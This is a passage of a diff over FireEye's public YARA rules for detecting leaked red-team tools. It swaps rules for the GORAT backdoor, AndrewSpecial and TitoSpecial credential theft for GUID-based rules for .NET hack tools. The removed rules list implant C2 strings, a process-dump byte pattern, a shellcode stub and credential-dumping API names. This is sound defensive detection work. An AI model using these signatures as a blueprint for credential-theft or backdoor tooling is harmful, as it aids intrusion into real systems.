+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpwebcrawler' project."
 		author = "FireEye"
-		id = "5ac84cf1-49fb-533d-b211-b1a92239063b"
+		id = "29b2a410-bcc4-58df-b192-7a413b3db1c0"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GORAT_1.yar#L4-L23"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPWEBCRAWLER_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "66cdaa156e4d372cfa3dea0137850d20"
-		logic_hash = "f6a0a923f64375e7ffdc080aec41db19a9e162405f1290ed0bbcce5a342bdadb"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "8df328663a813ca0a6864ae0503cbc1b03cfdf839215b9b4f2bb7962adf09bf8"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 4
+		rev = 2
 
 	strings:
-		$s1 = "httpComms.dll" ascii wide
-		$s2 = "Cookie: SID1=%s" ascii wide
-		$s3 = "Global\\" ascii wide
-		$s4 = "stage0.dll" ascii wide
-		$s5 = "runCommand" ascii wide
-		$s6 = "getData" ascii wide
-		$s7 = "initialize" ascii wide
-		$s8 = "Windows NT %d.%d;" ascii wide
-		$s9 = "!This program cannot be run in DOS mode." ascii wide
+		$typelibguid0 = "cf27abf4-ef35-46cd-8d0c-756630c686f1" ascii nocase wide
 
 	condition:
-		filesize < 50KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-
-rule FIREEYE_RT_APT_Backdoor_Win_GORAT_4 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPTEMPLATE_1 : FILE
 {
 	meta:
-		description = "Verifies that the sample is a Windows PE that is less than 10MB in size and exports numerous functions that are known to be exported by the Gorat implant. This is done in an effort to provide detection for packed samples that may not have other strings but will need to replicate exports to maintain functionality."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharptemplate' project."
 		author = "FireEye"
-		id = "fa3bcaad-c210-5b9c-8567-fe85b8e78055"
+		id = "0ca9a13c-e0a0-588b-be13-5954b17d95b1"
 		date = "2020-12-08"
-		modified = "2021-03-03"
+		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GORAT_4.yar#L5-L16"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPTEMPLATE_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "f59095f0ab15f26a1ead7eed8cdb4902"
-		logic_hash = "ec201614cb91fae9d7c89febfa22dfd6ba7f353e0eeb0b2fec6c8d887992e79e"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "9746c1ab7b945d311c53fbdf95993d255369e06b23a3279c9f2e8a4df73ab63c"
 		score = 75
-		quality = 25
+		quality = 73
 		tags = "FILE"
-		rev = 8
+		rev = 2
 
 	strings:
-		$mz = "MZ"
+		$typelibguid0 = "e9e452d4-9e58-44ff-ba2d-01b158dda9bb" ascii nocase wide
 
 	condition:
-		$mz at 0 and uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10MB and pe.exports ( "MemoryCallEntryPoint" ) and pe.exports ( "MemoryDefaultAlloc" ) and pe.exports ( "MemoryDefaultFree" ) and pe.exports ( "MemoryDefaultFreeLibrary" ) and pe.exports ( "MemoryDefaultGetProcAddress" ) and pe.exports ( "MemoryDefaultLoadLibrary" ) and pe.exports ( "MemoryFindResource" ) and pe.exports ( "MemoryFindResourceEx" ) and pe.exports ( "MemoryFreeLibrary" ) and pe.exports ( "MemoryGetProcAddress" ) and pe.exports ( "MemoryLoadLibrary" ) and pe.exports ( "MemoryLoadLibraryEx" ) and pe.exports ( "MemoryLoadResource" ) and pe.exports ( "MemoryLoadString" ) and pe.exports ( "MemoryLoadStringEx" ) and pe.exports ( "MemorySizeofResource" ) and pe.exports ( "callback" ) and pe.exports ( "crosscall2" ) and pe.exports ( "crosscall_386" )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Trojan_MSIL_GORAT_Plugin_DOTNET_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_MODIFIEDSHARPVIEW_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'RedFlare - Plugin - .NET' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'modifiedsharpview' project."
 		author = "FireEye"
-		id = "faa73d64-4bb1-5c06-a3a5-1f1aa99ea932"
+		id = "e07d3d4b-fba3-5df7-85f4-927bb8cec2d1"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/Trojan_MSIL_GORAT_Plugin_DOTNET_1.yar#L4-L16"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_MODIFIEDSHARPVIEW_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "e979822273c6d1ccdfebd341c9e2cb1040fe34a04e8b41c024885063fd946ad5"
+		hash = "db0eaad52465d5a2b86fdd6a6aa869a5"
+		logic_hash = "a47c48da998243fab92665649fb9d6ecc6ac32e1fd884c2c0d5ccecb05290c10"
 		score = 75
-		quality = 71
+		quality = 73
 		tags = "FILE"
-		rev = 1
+		rev = 3
 
 	strings:
-		$typelibguid0 = "cd9407d0-fc8d-41ed-832d-da94daa3e064" ascii nocase wide
-		$typelibguid1 = "fc3daedf-1d01-4490-8032-b978079d8c2d" ascii nocase wide
+		$typelibguid0 = "22a156ea-2623-45c7-8e50-e864d9fc44d3" ascii nocase wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Backdoor_Macos_GORAT_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPDACL_1 : FILE
 {
 	meta:
-		description = "This rule is looking for specific strings associated with network activity found within the MacOS generated variant of GORAT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpdacl' project."
 		author = "FireEye"
-		id = "4646eadb-7acf-582f-9ad6-00f012ceed8a"
+		id = "13f4e3ea-1e36-5fad-9197-66511d6f026a"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_MacOS_GORAT_1.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPDACL_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "68acf11f5e456744262ff31beae58526"
-		logic_hash = "2df5f87d44968670511880d21ad184779d0561c7c426a5d6426bcefd0904a9b7"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "5f44ec5ddded18fb3a9132b469b2fe7ccbffb3f907325485f0f72fe3d6bbfa23"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		rev = 3
 
 	strings:
-		$s1 = "SID1=%s" ascii wide
-		$s2 = "http/http.dylib" ascii wide
-		$s3 = "Mozilla/" ascii wide
-		$s4 = "User-Agent" ascii wide
-		$s5 = "Cookie" ascii wide
+		$typelibguid0 = "b3c17fb5-5d5a-4b14-af3c-87a9aa941457" ascii nocase wide
 
 	condition:
-		(( uint32( 0 ) == 0xBEBAFECA ) or ( uint32( 0 ) == 0xFEEDFACE ) or ( uint32( 0 ) == 0xFEEDFACF ) or ( uint32( 0 ) == 0xCEFAEDFE ) ) and all of them
+		filesize < 10MB and ( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Backdoor_Win_Gorat_Memory
+rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPPATCHCHECK_1 : FILE
 {
 	meta:
-		description = "Identifies GoRat malware in memory based on strings."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharppatchcheck' project."
 		author = "FireEye"
-		id = "16fb1db7-711c-5d8d-9203-738c94f253fe"
+		id = "dedc12b9-b9e7-5c13-ad6d-2e286aba2302"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GoRat_Memory.yar#L4-L27"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPPATCHCHECK_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "3b926b5762e13ceec7ac3a61e85c93bb"
-		logic_hash = "88272e59325d106f96d6b6f1d57daf968823c1e760067dee0334c66c521ce8c2"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "dec6231b656eed1526d4f70fe1b9a476bfb06246f0a7c25f2687d8c68886d400"
 		score = 75
-		quality = 75
-		tags = ""
-		rev = 1
+		quality = 73
+		tags = "FILE"
+		rev = 2
 
 	strings:
-		$murica = "murica" fullword
-		$rat1 = "rat/modules/socks.(*HTTPProxyClient).beacon" fullword
-		$rat2 = "rat.(*Core).generateBeacon" fullword
-		$rat3 = "rat.gJitter" fullword
-		$rat4 = "rat/comms.(*protectedChannel).SendCmdResponse" fullword
-		$rat5 = "rat/modules/filemgmt.(*acquire).NewCommandExecution" fullword
-		$rat6 = "rat/modules/latlisten.(*latlistensrv).handleCmd" fullword
-		$rat7 = "rat/modules/netsweeper.(*netsweeperRunner).runSweep" fullword
-		$rat8 = "rat/modules/netsweeper.(*Pinger).listen" fullword
-		$rat9 = "rat/modules/socks.(*HTTPProxyClient).beacon" fullword
-		$rat10 = "rat/platforms/win/dyloader.(*memoryLoader).ExecutePluginFunction" fullword
-		$rat11 = "rat/platforms/win/modules/namedpipe.(*dummy).Open" fullword
-		$winblows = "rat/platforms/win.(*winblows).GetStage" fullword
+		$typelibguid0 = "528b8df5-6e5e-4f3b-b617-ac35ed2f8975" ascii nocase wide
 
 	condition:
-		$winblows or #murica > 10 or 3 of ( $rat* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Backdoor_Win_GORAT_5 : FILE
+rule FIREEYE_RT_Credtheft_MSIL_Wcmdump_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'WCMDump' project."
 		author = "FireEye"
-		id = "73102bd2-7b94-5c7b-b9a4-cfc9cf5e3212"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "22796ccb-a01e-59d8-8c3a-6cbb62899940"
+		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GORAT_5.yar#L4-L23"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/CredTheft_MSIL_WCMDump_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f"
-		logic_hash = "67f85fb3bedfd18a1226c92318f387be3c7ff9566ca2d554c49cf62389482552"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "9fbf53e551342695b306b10f30a3fe32dff359bd70e84e1fa1f190772f5dcbe3"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$1 = "comms.BeaconData" fullword
-		$2 = "comms.CommandResponse" fullword
-		$3 = "rat.BaseChannel" fullword
-		$4 = "rat.Config" fullword
-		$5 = "rat.Core" fullword
-		$6 = "platforms.AgentPlatform" fullword
-		$7 = "GetHostID" fullword
-		$8 = "/rat/cmd/gorat_shared/dllmain.go" fullword
+		$typelibguid0 = "21e322f2-4586-4aeb-b1ed-d240e2a79e19" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Trojan_MSIL_GORAT_Module_Powershell_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPSQLCLIENT_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'RedFlare - Module - PowerShell' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpsqlclient' project."
 		author = "FireEye"
-		id = "b0fba130-9cd9-5b7f-a806-9ff8099f5731"
+		id = "4d526c36-f56f-53cf-9bdf-b7a15619eb41"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/Trojan_MSIL_GORAT_Module_PowerShell_1.yar#L4-L16"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPSQLCLIENT_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
 		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "e596bc0316a4ef85f04c2683ebc7c94bf9b831843232c33e62c84991e4caeb97"
+		logic_hash = "bc79f80582f4fadecf54d926abdcf61694224654ba5075203f0d1123cf11afc1"
 		score = 75
-		quality = 71
+		quality = 73
 		tags = "FILE"
-		rev = 1
+		rev = 2
 
 	strings:
-		$typelibguid0 = "38d89034-2dd9-4367-8a6e-5409827a243a" ascii nocase wide
-		$typelibguid1 = "845ee9dc-97c9-4c48-834e-dc31ee007c25" ascii nocase wide
+		$typelibguid0 = "13ed03cd-7430-410d-a069-cf377165fbfd" ascii nocase wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Backdoor_Win_GORAT_2 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPNFS_1 : FILE
 {
 	meta:
-		description = "Verifies that the sample is a Windows PE that is less than 10MB in size and has the Go build ID strings. Then checks for various strings known to be in the Gorat implant including strings used in C2 json, names of methods, and the unique string 'murica' used in C2 comms. A check is done to ensure the string 'rat' appears in the binary over 1000 times as it is the name of the project used by the implant and is present well over 2000 times."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpnfs' project."
 		author = "FireEye"
-		id = "e2c47711-d088-5cb4-8d21-f8199a865a28"
+		id = "b9d1b4e8-644a-5611-85e8-a124f915b443"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GORAT_2.yar#L4-L34"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPNFS_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "f59095f0ab15f26a1ead7eed8cdb4902"
-		logic_hash = "8efc904498386d89879766a5021148a250f639bc328df12a34cfc8d620df6f6c"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "e7f9883376b153849970599d9ecc308882eb86a67834cfd8ab06b44539346125"
 		score = 75
-		quality = 50
+		quality = 73
 		tags = "FILE"
-		rev = 7
+		rev = 3
 
 	strings:
-		$go1 = "go.buildid" ascii wide
-		$go2 = "Go build ID:" ascii wide
-		$json1 = "json:\"pid\"" ascii wide
-		$json2 = "json:\"key\"" ascii wide
-		$json3 = "json:\"agent_time\"" ascii wide
-		$json4 = "json:\"rid\"" ascii wide
-		$json5 = "json:\"ports\"" ascii wide
-		$json6 = "json:\"agent_platform\"" ascii wide
-		$rat = "rat" ascii wide
-		$str1 = "handleCommand" ascii wide
-		$str2 = "sendBeacon" ascii wide
-		$str3 = "rat.AgentVersion" ascii wide
-		$str4 = "rat.Core" ascii wide
-		$str5 = "rat/log" ascii wide
-		$str6 = "rat/comms" ascii wide
-		$str7 = "rat/modules" ascii wide
-		$str8 = "murica" ascii wide
-		$str9 = "master secret" ascii wide
-		$str10 = "TaskID" ascii wide
-		$str11 = "rat.New" ascii wide
+		$typelibguid0 = "9f67ebe3-fc9b-40f2-8a18-5940cfed44cf" ascii nocase wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10MB and all of ( $go* ) and all of ( $json* ) and all of ( $str* ) and #rat > 1000
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Backdoor_Win_GORAT_3 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_REDTEAMMATERIALS_1 : FILE
 {
 	meta:
-		description = "This rule uses the same logic as FE_APT_Trojan_Win_GORAT_1_FEBeta with the addition of one check, to look for strings that are known to be in the Gorat implant when a certain cleaning script is not run against it."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'red_team_materials' project."
 		author = "FireEye"
-		id = "94c195b5-b8e8-56a7-bc11-dbbe2f969b06"
+		id = "272cd3e9-884a-566b-ae90-4a79ee726a8d"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GORAT_3.yar#L4-L39"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_REDTEAMMATERIALS_1.yar#L4-L16"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "995120b35db9d2f36d7d0ae0bfc9c10d"
-		logic_hash = "592745e9c67f7adf0cd48975ed1497211d8efeff29b52be1e2d082b9a648bb57"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "ca54a1e8335c4256295fc643f5d31eae2e89f020dc7a9b571c4772edaad08022"
 		score = 75
-		quality = 28
+		quality = 71
 		tags = "FILE"
-		rev = 5
+		rev = 3
 
 	strings:
-		$dirty1 = "fireeye" ascii nocase wide
-		$dirty2 = "kulinacs" ascii nocase wide
-		$dirty3 = "RedFlare" ascii nocase wide
-		$dirty4 = "gorat" ascii nocase wide
-		$dirty5 = "flare" ascii nocase wide
-		$go1 = "go.buildid" ascii wide
-		$go2 = "Go build ID:" ascii wide
-		$json1 = "json:\"pid\"" ascii wide
-		$json2 = "json:\"key\"" ascii wide
-		$json3 = "json:\"agent_time\"" ascii wide
-		$json4 = "json:\"rid\"" ascii wide
-		$json5 = "json:\"ports\"" ascii wide
-		$json6 = "json:\"agent_platform\"" ascii wide
-		$rat = "rat" ascii wide
-		$str1 = "handleCommand" ascii wide
-		$str2 = "sendBeacon" ascii wide
-		$str3 = "rat.AgentVersion" ascii wide
-		$str4 = "rat.Core" ascii wide
-		$str5 = "rat/log" ascii wide
-		$str6 = "rat/comms" ascii wide
-		$str7 = "rat/modules" ascii wide
-		$str8 = "murica" ascii wide
-		$str9 = "master secret" ascii wide
-		$str10 = "TaskID" ascii wide
-		$str11 = "rat.New" ascii wide
+		$typelibguid0 = "86c95a99-a2d6-4ebe-ad5f-9885b06eab12" ascii nocase wide
+		$typelibguid1 = "e06f1411-c7f8-4538-bbb9-46c928732245" ascii nocase wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10MB and all of ( $go* ) and all of ( $json* ) and all of ( $str* ) and #rat > 1000 and any of ( $dirty* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Hacktool_Win32_Andrewspecial_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPZIPLIBZIPPER_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpziplibzipper' project."
 		author = "FireEye"
-		id = "69e27e92-d68e-5543-bada-170e32733dbb"
-		date = "2020-11-25"
-		date = "2020-11-25"
+		id = "392a52be-29ae-58e1-b517-1ab34a1e1fb8"
+		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TITOSPECIAL/production/yara/HackTool_Win32_AndrewSpecial_1.yar#L4-L18"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPZIPLIBZIPPER_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "e89efa88e3fda86be48c0cc8f2ef7230"
-		logic_hash = "529a49fb21250069111d03a174901dc2e1623ee2a1f446aae1bdb1579a227dd3"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "19354edb91a0d79fdf79437f7247bcf155514db40340af91a3320b556dc2e4c2"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 4
+		rev = 3
 
 	strings:
-		$dump = { 6A 00 68 FF FF 1F 00 FF 15 [4] 89 45 ?? 83 [2] 00 [1-50] 6A 00 68 80 00 00 00 6A 02 6A 00 6A 00 68 00 00 00 10 68 [4] FF 15 [4] 89 45 [10-70] 6A 00 6A 00 6A 00 6A 02 8B [2-4] 5? 8B [2-4] 5? 8B [2-4] 5? E8 [4-20] FF 15 }
-		$shellcode_x86 = { B8 3C 00 00 00 33 C9 8D 54 24 04 64 FF 15 C0 00 00 00 83 C4 04 C2 14 00 }
-		$shellcode_x86_inline = { C6 45 ?? B8 C6 45 ?? 3C C6 45 ?? 00 C6 45 ?? 00 C6 45 ?? 00 C6 45 ?? 33 C6 45 ?? C9 C6 45 ?? 8D C6 45 ?? 54 C6 45 ?? 24 C6 45 ?? 04 C6 45 ?? 64 C6 45 ?? FF C6 45 ?? 15 C6 45 ?? C0 C6 45 ?? 00 C6 45 ?? 00 C6 45 ?? 00 C6 45 ?? 83 C6 45 ?? C4 C6 45 ?? 04 C6 45 ?? C2 C6 45 ?? 14 C6 45 ?? 00 }
+		$typelibguid0 = "485ba350-59c4-4932-a4c1-c96ffec511ef" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and $dump and any of ( $shellcode* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Credtheft_MSIL_Titospecial_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPDNS_1 : FILE
 {
 	meta:
-		description = "This rule looks for .NET PE files that have the strings of various method names in the TitoSpecial code."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpdns' project."
 		author = "FireEye"
-		id = "932bb013-03de-5cf7-89e9-b3232151d303"
+		id = "db6b45be-f42f-5d0f-b50a-32e7a2cbfce6"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TITOSPECIAL/production/yara/CredTheft_MSIL_TitoSpecial_1.yar#L4-L27"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPDNS_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "4bf96a7040a683bd34c618431e571e26"
-		logic_hash = "4ac9a5ede4aea5d73545b459eb635f87ce08ba521afa48b76d2cfa94f1379226"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "bab36f9b1532c3b24c2aea2907006820ed7cf1c90dae7a8138962e14ac9eff55"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 4
+		rev = 2
 
 	strings:
-		$str1 = "Minidump" ascii wide
-		$str2 = "dumpType" ascii wide
-		$str3 = "WriteProcessMemory" ascii wide
-		$str4 = "bInheritHandle" ascii wide
-		$str5 = "GetProcessById" ascii wide
-		$str6 = "SafeHandle" ascii wide
-		$str7 = "BeginInvoke" ascii wide
-		$str8 = "EndInvoke" ascii wide
-		$str9 = "ConsoleApplication1" ascii wide
-		$str10 = "getOSInfo" ascii wide
